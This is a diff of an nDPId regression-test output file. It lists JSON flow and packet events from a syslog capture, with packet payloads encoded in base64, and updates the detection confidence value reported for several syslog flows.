00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1377043331844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":182,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":182,"pkt_l4_len":148,"thread_ts_msec":1377043331844,"pkt":"vDBb56YVAASWJ4vKCABFAACoJ0cAADwRXWysFDM2rB9uKAICAgIAlCzbPDEzND44NTQgMDgvMjAvMjAxMy0xOTowNToyMyBDT05GSUcgUUxBMjNYWCBQQ0lERVYwMyBEaXNjTG9vcElkIHFsYTIzeHhTdE1hY2hSdW4uY3h4IDM1MTAKMCBMb2NhbCBQb3J0IENvbm5lY3Rpb24gVHlwZT0gTE9PUDogbG9vcElkPTB4N0QKCgA="} -00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1377043331844,"flow_last_seen":1377043331844,"flow_idle_time":200000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1377043331844,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00639{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1377043331844,"flow_last_seen":1377043331844,"flow_idle_time":200000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1377043331844,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00613{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1377043331884,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1377043331884,"pkt":"vDBb56YVAASWJ4vKCABFAAChJ0gAADwRXXKsFDM2rB9uKAICAgIAjZRnPDEzND44NTQgMDgvMjAvMjAxMy0xOTowNToyMyBDT05GSUcgRkNQVCBCdWlsZExvb3BNYXAgZmNwVHJhbnNwb3J0TG9jYWxQb3J0LmNwcCAxOTg5CjAgTG9vcE1hcDogMDE5ZDlmOWU5YjhmOTg5MDk3YWJhYWE5YWNhNWE3YTZhMwoKAA=="} 00689{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1377043331893,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1377043331893,"pkt":"vDBb56YVAASWJ4vKCABFAADcJ0kAADwRXTasFDM2rB9uKAICAgIAyJYPPDEzND44NTQgMDgvMjAvMjAxMy0xOTowNToyMyBDT05GSUcgRkNQVCBHZW5lcmF0ZUV2ZW50IGZjcFRyYW5zcG9ydExvY2FsUG9ydC5jcHAgMTIxOAowIEZDUCBMb2NhbCBQb3J0IFN0YXRlIFVQICA6IFdXTj0weDUwMDBEMzEwMDAwMzU2MDYgcG9ydElkPTB4MDAwMDAxIHBvcnRSb2xlPUJvdGggTG9jYWxQb3J0SW5kZXg9MHgwMDAzCgoA"} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":18,"packets-processed":15,"total-skipped-flows":0,"total-l4-payload-len":2295,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":12,"global_ts_msec":1388653792914} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388653792914,"flow_last_seen":1388653792914,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1388653792914,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1388653792914,"pkt":"gPsG8EXX4KHXGMJyCABFtABoYZ9AAEARc\/cK+xeLPicDjuc6AgIAVGhaPDE0Nz5KYW4gIDIgMTA6MDk6NTIgbmI2IGNoaWxsaXNwb3RbNDIyMl06IEM6MTkyLjE2OC4yLjgzLzAwOjE5OjdEOjNCOjZGOkQ0Cg=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388653792914,"flow_last_seen":1388653792914,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1377043331844,"flow_last_seen":1377043354299,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":2295,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1388653792914,"flow_last_seen":1388653792914,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"syslog.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1377043331844,"flow_last_seen":1377043354299,"flow_idle_time":200000,"flow_min_l4_payload_len":108,"flow_max_l4_payload_len":192,"flow_tot_l4_payload_len":2295,"flow_avg_l4_payload_len":153,"midstream":0,"thread_ts_msec":1388653792914,"l3_proto":"ip4","src_ip":"172.20.51.54","dst_ip":"172.31.110.40","src_port":514,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00538{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1388653841215,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":118,"pkt_l4_len":84,"thread_ts_msec":1388653841215,"pkt":"gPsG8EXX4KHXGMJyCABFtABoYaBAAEARc\/YK+xeLPicDjuc6AgIAVHJZPDE0Nz5KYW4gIDIgMTA6MTA6NDEgbmI2IGNoaWxsaXNwb3RbNDIyMl06IEQ6MTkyLjE2OC4yLjgzLzAwOjE5OjdEOjNCOjZGOkQ0Cg=="} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":20,"packets-processed":17,"total-skipped-flows":0,"total-l4-payload-len":2447,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":2,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1488571038380} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571038380,"flow_last_seen":1488571038380,"flow_idle_time":200000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1488571038380,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1488571038380,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":161,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":161,"pkt_l4_len":123,"thread_ts_msec":1488571038380,"pkt":"AAAMn\/B5ACEbrjHBgQAAeQgARQAAjwBGAAD\/EUiywKh5CsCoeArDoAICAHsygDwxODk+NzI6IE1hciAgMyAxOTo1NzoxNy4zNzE6ICVMSU5LLTUtQ0hBTkdFRDogSW50ZXJmYWNlIEdpZ2FiaXRFdGhlcm5ldDAvMiwgY2hhbmdlZCBzdGF0ZSB0byBhZG1pbmlzdHJhdGl2ZWx5IGRvd24="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571038380,"flow_last_seen":1488571038380,"flow_idle_time":200000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1488571038380,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571038380,"flow_last_seen":1488571038380,"flow_idle_time":200000,"flow_min_l4_payload_len":115,"flow_max_l4_payload_len":115,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1488571038380,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00601{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1488571038381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":165,"pkt_l4_len":127,"thread_ts_msec":1488571038381,"pkt":"AAAMn\/B5ACEbrjHBgQAAeQgARQAAkwBHAAD\/EUitwKh5CsCoeArDoAICAH\/o6TwxODk+NzM6IE1hciAgMyAxOTo1NzoxOC4zNzc6ICVMSU5FUFJPVE8tNS1VUERPV046IExpbmUgcHJvdG9jb2wgb24gSW50ZXJmYWNlIEdpZ2FiaXRFdGhlcm5ldDAvMiwgY2hhbmdlZCBzdGF0ZSB0byBkb3du"} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":22,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1388653792914,"flow_last_seen":1388653841215,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1488571038381,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":22,"source":"syslog.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1388653792914,"flow_last_seen":1388653841215,"flow_idle_time":200000,"flow_min_l4_payload_len":76,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":152,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1488571038381,"l3_proto":"ip4","src_ip":"10.251.23.139","dst_ip":"62.39.3.142","src_port":59194,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00568{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1488571187162,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":141,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":141,"pkt_l4_len":103,"thread_ts_msec":1488571187162,"pkt":"AAAMn\/B5ACEbrjHBgQAAeQgARQAAewBIAAD\/EUjEwKh5CsCoeArDoAICAGcZkzwxODc+NzQ6IE1hciAgMyAxOTo1OTo0Ni4xNTI6ICVMSU5LLTMtVVBET1dOOiBJbnRlcmZhY2UgR2lnYWJpdEV0aGVybmV0MC8yLCBjaGFuZ2VkIHN0YXRlIHRvIHVw"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571330521,"flow_last_seen":1488571330521,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1488571330521,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00627{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1488571330521,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":184,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":184,"pkt_l4_len":146,"thread_ts_msec":1488571330521,"pkt":"ABpsoSuZAB56eT8RgQAAeQgARQAApgA+AAD\/EUirwKh5AsCoeArEsAICAJJuQTwxOTA+NjM6IE1hciAgMyAyMDowMjowOS40NjQ6ICVJUFY2X0FDTC02LUFDQ0VTU0xPR1A6IGxpc3QgdnR5LWFjY2Vzcy8xMCBwZXJtaXR0ZWQgdGNwIDIwMDM6NTE6NjAxMjoxMTA6OkIxNToyMig2MDg5MikgLT4gOjooMjIpLCAxIHBhY2tldA=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571330521,"flow_last_seen":1488571330521,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1488571330521,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1488571330521,"flow_last_seen":1488571330521,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":138,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":138,"midstream":0,"thread_ts_msec":1488571330521,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1488571330522,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":201,"pkt_type":2048,"pkt_l3_offset":18,"pkt_l4_offset":38,"pkt_len":201,"pkt_l4_len":163,"thread_ts_msec":1488571330522,"pkt":"ABpsoSuZAB56eT8RgQAAeQgARQAAtwA\/AAD\/EUiZwKh5AsCoeArEsAICAKOtbzwxOTA+NjQ6IE1hciAgMyAyMDowMjowOS40Njg6ICVJUFY2X0FDTC02LUFDQ0VTU0xPR1A6IGxpc3QgdnR5LWFjY2Vzcy8xMCBwZXJtaXR0ZWQgdGNwIDIwMDM6NTE6NjAxMjoxMTA6OkIxNToyMig2MDg5MikgLT4gMjAwMzo1MTo2MDEyOjEyMTo6MigyMiksIDEgcGFja2V0"} -00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1488571330522,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1488571038380,"flow_last_seen":1488571189276,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1488571330522,"l3_proto":"ip4","src_ip":"192.168.121.10","dst_ip":"192.168.120.10","src_port":50080,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 00553{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","packets-captured":26,"packets-processed":23,"total-skipped-flows":0,"total-l4-payload-len":3186,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":4,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":30,"global_ts_msec":1557406267494} 00548{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1557406267494,"flow_last_seen":1557406267494,"flow_idle_time":620000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":446,"flow_tot_l4_payload_len":446,"flow_avg_l4_payload_len":446,"midstream":0,"thread_ts_msec":1557406267494,"l3_proto":"ip4","src_ip":"193.24.227.10","dst_ip":"216.66.86.114","l4_proto":41,"flow_datalink":1,"flow_max_packets":3} 01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1557406267494,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406267494,"pkt":"ABDb\/xAAACFZH\/EMCABFAAHSd60AAIAp7n3BGOMK2EJWcmAAAAABlhFAIAEEcABsAKEAAAAAAAAAAiABBHB2WwAAAAAAAAsVACKVDwICAZY93TwxMzM+c3NnOiBOZXRTY3JlZW4gZGV2aWNlX2lkPTAxODUwODIwMDgwMDE1NDEgIFtSb290XXN5c3RlbS1ub3RpZmljYXRpb24tMDAyNTcodHJhZmZpYyk6IHN0YXJ0X3RpbWU9IjIwMTktMDUtMDkgMTQ6NTA6MDgiIGR1cmF0aW9uPTU5IHBvbGljeV9pZD0xIHNlcnZpY2U9ZG5zIHByb3RvPTE3IHNyYyB6b25lPVRydXN0IGRzdCB6b25lPVVudHJ1c3QgYWN0aW9uPVBlcm1pdCBzZW50PTEzNiByY3ZkPTAgc3JjPTE5My4yNC4yMjcuMTk2IGRzdD05LjkuOS45IHNyY19wb3J0PTQxNDQzIGRzdF9wb3J0PTUzIHNyYy14bGF0ZWQgaXA9MTkzLjI0LjIyNy4xOTYgcG9ydD00MTQ0MyBkc3QteGxhdGVkIGlwPTkuOS45LjkgcG9ydD01MyBzZXNzaW9uX2lkPTQ4MDQ2IHJlYXNvbj1DbG9zZSAtIEFHRSBPVVQA"} @@ -34,14 +34,14 @@ 01019{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1557406267510,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406267510,"pkt":"ABRpnhFAABDb\/xAACABFAAHSqgRAAPspB3jYQlAewRjjDGAAAAABlhE7IAEEcABsAKEAAAAAAAAAAiABBHB2WwAAAAAAAAsVACKVDwICAZY93TwxMzM+c3NnOiBOZXRTY3JlZW4gZGV2aWNlX2lkPTAxODUwODIwMDgwMDE1NDEgIFtSb290XXN5c3RlbS1ub3RpZmljYXRpb24tMDAyNTcodHJhZmZpYyk6IHN0YXJ0X3RpbWU9IjIwMTktMDUtMDkgMTQ6NTA6MDgiIGR1cmF0aW9uPTU5IHBvbGljeV9pZD0xIHNlcnZpY2U9ZG5zIHByb3RvPTE3IHNyYyB6b25lPVRydXN0IGRzdCB6b25lPVVudHJ1c3QgYWN0aW9uPVBlcm1pdCBzZW50PTEzNiByY3ZkPTAgc3JjPTE5My4yNC4yMjcuMTk2IGRzdD05LjkuOS45IHNyY19wb3J0PTQxNDQzIGRzdF9wb3J0PTUzIHNyYy14bGF0ZWQgaXA9MTkzLjI0LjIyNy4xOTYgcG9ydD00MTQ0MyBkc3QteGxhdGVkIGlwPTkuOS45LjkgcG9ydD01MyBzZXNzaW9uX2lkPTQ4MDQ2IHJlYXNvbj1DbG9zZSAtIEFHRSBPVVQA"} 01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"syslog.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1557406275495,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406275495,"pkt":"ABDb\/xAAACFZH\/EMCABFAAHSd7gAAIAp7nLBGOMK2EJWcmAAAAABlhFAIAEEcABsAKEAAAAAAAAAAiABBHB2WwAAAAAAAAsVACKVDwICAZYwyTwxMzM+c3NnOiBOZXRTY3JlZW4gZGV2aWNlX2lkPTAxODUwODIwMDgwMDE1NDEgIFtSb290XXN5c3RlbS1ub3RpZmljYXRpb24tMDAyNTcodHJhZmZpYyk6IHN0YXJ0X3RpbWU9IjIwMTktMDUtMDkgMTQ6NTA6MTYiIGR1cmF0aW9uPTU5IHBvbGljeV9pZD0xIHNlcnZpY2U9ZG5zIHByb3RvPTE3IHNyYyB6b25lPVRydXN0IGRzdCB6b25lPVVudHJ1c3QgYWN0aW9uPVBlcm1pdCBzZW50PTEzNiByY3ZkPTAgc3JjPTE5My4yNC4yMjcuMTk2IGRzdD05LjkuOS45IHNyY19wb3J0PTU1Njg3IGRzdF9wb3J0PTUzIHNyYy14bGF0ZWQgaXA9MTkzLjI0LjIyNy4xOTYgcG9ydD01NTY4NyBkc3QteGxhdGVkIGlwPTkuOS45LjkgcG9ydD01MyBzZXNzaW9uX2lkPTQ4MDU5IHJlYXNvbj1DbG9zZSAtIEFHRSBPVVQA"} 01020{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"syslog.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1557406275511,"flow_idle_time":620000,"pkt_oversize":false,"pkt_caplen":480,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":480,"pkt_l4_len":446,"thread_ts_msec":1557406275511,"pkt":"ABRpnhFAABDb\/xAACABFAAHSru1AAPspAo\/YQlAewRjjDGAAAAABlhE7IAEEcABsAKEAAAAAAAAAAiABBHB2WwAAAAAAAAsVACKVDwICAZYwyTwxMzM+c3NnOiBOZXRTY3JlZW4gZGV2aWNlX2lkPTAxODUwODIwMDgwMDE1NDEgIFtSb290XXN5c3RlbS1ub3RpZmljYXRpb24tMDAyNTcodHJhZmZpYyk6IHN0YXJ0X3RpbWU9IjIwMTktMDUtMDkgMTQ6NTA6MTYiIGR1cmF0aW9uPTU5IHBvbGljeV9pZD0xIHNlcnZpY2U9ZG5zIHByb3RvPTE3IHNyYyB6b25lPVRydXN0IGRzdCB6b25lPVVudHJ1c3QgYWN0aW9uPVBlcm1pdCBzZW50PTEzNiByY3ZkPTAgc3JjPTE5My4yNC4yMjcuMTk2IGRzdD05LjkuOS45IHNyY19wb3J0PTU1Njg3IGRzdF9wb3J0PTUzIHNyYy14bGF0ZWQgaXA9MTkzLjI0LjIyNy4xOTYgcG9ydD01NTY4NyBkc3QteGxhdGVkIGlwPTkuOS45LjkgcG9ydD01MyBzZXNzaW9uX2lkPTQ4MDU5IHJlYXNvbj1DbG9zZSAtIEFHRSBPVVQA"} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":30,"source":"syslog.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1488571330521,"flow_last_seen":1488571330522,"flow_idle_time":200000,"flow_min_l4_payload_len":138,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1557406275511,"l3_proto":"ip4","src_ip":"192.168.121.2","dst_ip":"192.168.120.10","src_port":50352,"dst_port":514,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Syslog","breed":"Acceptable","category":"System"}} 